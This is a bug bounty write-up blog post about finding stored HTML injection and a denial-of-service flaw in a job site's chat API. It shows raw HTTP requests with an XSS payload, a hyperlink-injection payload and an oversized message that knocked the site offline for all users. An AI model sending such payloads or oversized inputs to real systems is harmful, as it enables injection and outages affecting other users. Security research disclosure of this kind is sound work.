RiotSecurityTeam Blogs

RiotSecurityTeam Blogs

DOS & Stored HTML Injection Bug Bounty Writeup

What will be covered in todays blog?

  1. DOS attack and its affect

  2. A bit about the target

  3. How I found the bugs

  • A DOS (Denial Of Service) is an attack that is meant to take down a targets website/network etc this happens by the attacker sending high amounts of traffic or information, for example me sending a query of 'query 123' 5000 times in a request may cause a crash due to the amount of information being sent at once.

DOS & Stored HTML Injection Bug Bounty Writeup

  • The target had over 500,000 active users, an image below just shows the login page, clean basic UI. The company allowed you to search for jobs and had over 2million applications made, with that being said the first bit of functionality was creating a profile I registered a user which took a while as I had to choose my talents, fill in addresses, what jobs I am looking for etc etc. image.png

image.png

image.png

  • As seem above there is a search option to message a friend/anyone else with information such as a username, title, body (on there account) which I thought as a weird functionality for a website that offers you to search for jobs and apply but I also thought it was a good place to test for bugs.

image.png

  • Before a deep dive into the chat functionality I did check for CSRF but they did have CSRF Tokens and CFUID. So I decided to look into the chat functionality and see what kind of bugs I could find at first I tried XSS (Cross Site Scripting) the request shown below shows me capturing the request in burp and trying an XSS Payload.
POST /api/v1/chat_rooms/38589/reply HTTP/1.1
Host: thewebsite.com
Content-Length: 64
Accept: application/json, text/javascript, */*; q=0.01
X-CSRF-Token:X-CSRF Token value
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://www.thewebsite.com
Referer: https://www.thewebsite.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie:Cookies
Connection: close

chat_message%5Bbody%5D=%22%3E%3Cimg+src+onerror%3Dalert(1)%3E%0A
  • The request above shows the payload being URL Encoded decoding the URL Encoded values we still an "img" tag which we use to capture images than "src" attribute which was left blank (nothing) with an "onerror" event handler which gets triggered as there is no image "src"/an invalid "src" so the "onerror" event handler gets triggered which contains an alert as its method.
  • The screen shot below shows a stripped version of our payload indicating there is some sort of client side sanitization preventing us from using the payload shown above this indicates the security measures were in place for the chat functionality.

image.png

  • Further on attempting HTML Injection on the chat application, I firstly tried to create some hyper links. If you don't understand the following please read my previous blog on HTML Injection blog.riotsecurityteam.com/deep-dive-into-ht..
POST /api/v1/chat_rooms/38589/reply HTTP/1.1
Host: thewebsite.com
Content-Length: 85
Accept: application/json, text/javascript, */*; q=0.01
X-CSRF-Token: X-CSRF-Token
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://www.thewebsite.com
Referer: https://www.thewebsite.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Cookies

chat_message%5Bbody%5D=%3Ca+href%3Dhttps%3A%2F%2Fwww.google.com%3EHyperlink%3C%2Fa%3E
  • Further on decoding this URL Encoded value we have an anchor tag (a) tags, an href attribute to tell the hyperlink what I want it to do in our case go to google.com and then we make the name "Hyperlink" than we shut off the anchor tag.

image.png

  • That worked to my surprise, now I had Stored HTML Injection in the chat functionality which is stored, I decided to try leveraging this to XSS using the javascript:alert(1) method but it would create the hyperlink but not execute I assume this was down to sanitization, as shown below though we do see we did successfully create a hyperlink indicating its vulnerable to HTML Injection.

image.png

  • Me and my friend did try other methods to get XSS but we decided to move on to attempting a DOS, so I firstly sent a message but I added around 10000 "a" characters as shown below.
POST /api/v1/chat_rooms/38589/reply HTTP/1.1
Host: thewebsite.com
Content-Length: 85
Accept: application/json, text/javascript, */*; q=0.01
X-CSRF-Token: X-CSRF-Token
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://www.thewebsite.com
Referer: https://www.thewebsite.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Cookies

chat_message%5Bbody%5D=the query string here
  • At that point it was lagging my own browser of course and then it sent the message but me and my friend didn't see it come through so I sent it again and the same thing happen, we moved back to attempting to get XSS until around 15 minutes after trying the DOS I see the message. I opened the chat I sent it in and I didn't get crashed but than I gave it another 5 minutes and moved around and I got a "504" indicating the server was trying to cope but couldn't and the same happen to my friend so we successfully succeeded a DOS but than it occured the whole website got taken down, I tried getting multiple friends to load it and they got 500 application error/504 gateway timed out... So our DOS affected everyone. I immediately contacted the BBP and teams to report this it was back up within 5 hours and since the DOS has been fixed and I have not been able to recreate the attack thankfully! The image shows below the fixed attempt it does not affect me.

image.png

image.png

image.png

I hope you have learnt something in this blog, I am not sure why the whole web server crashed for everyone but I am sure there's multiple reasons thanks for reading, also thank you to twitter.com/RitikSahni22 for shouting me out in his new letter go read some of his blogs they're amazing!

RiotSecurityTeam Twitter

My friends Twitter

 
Share this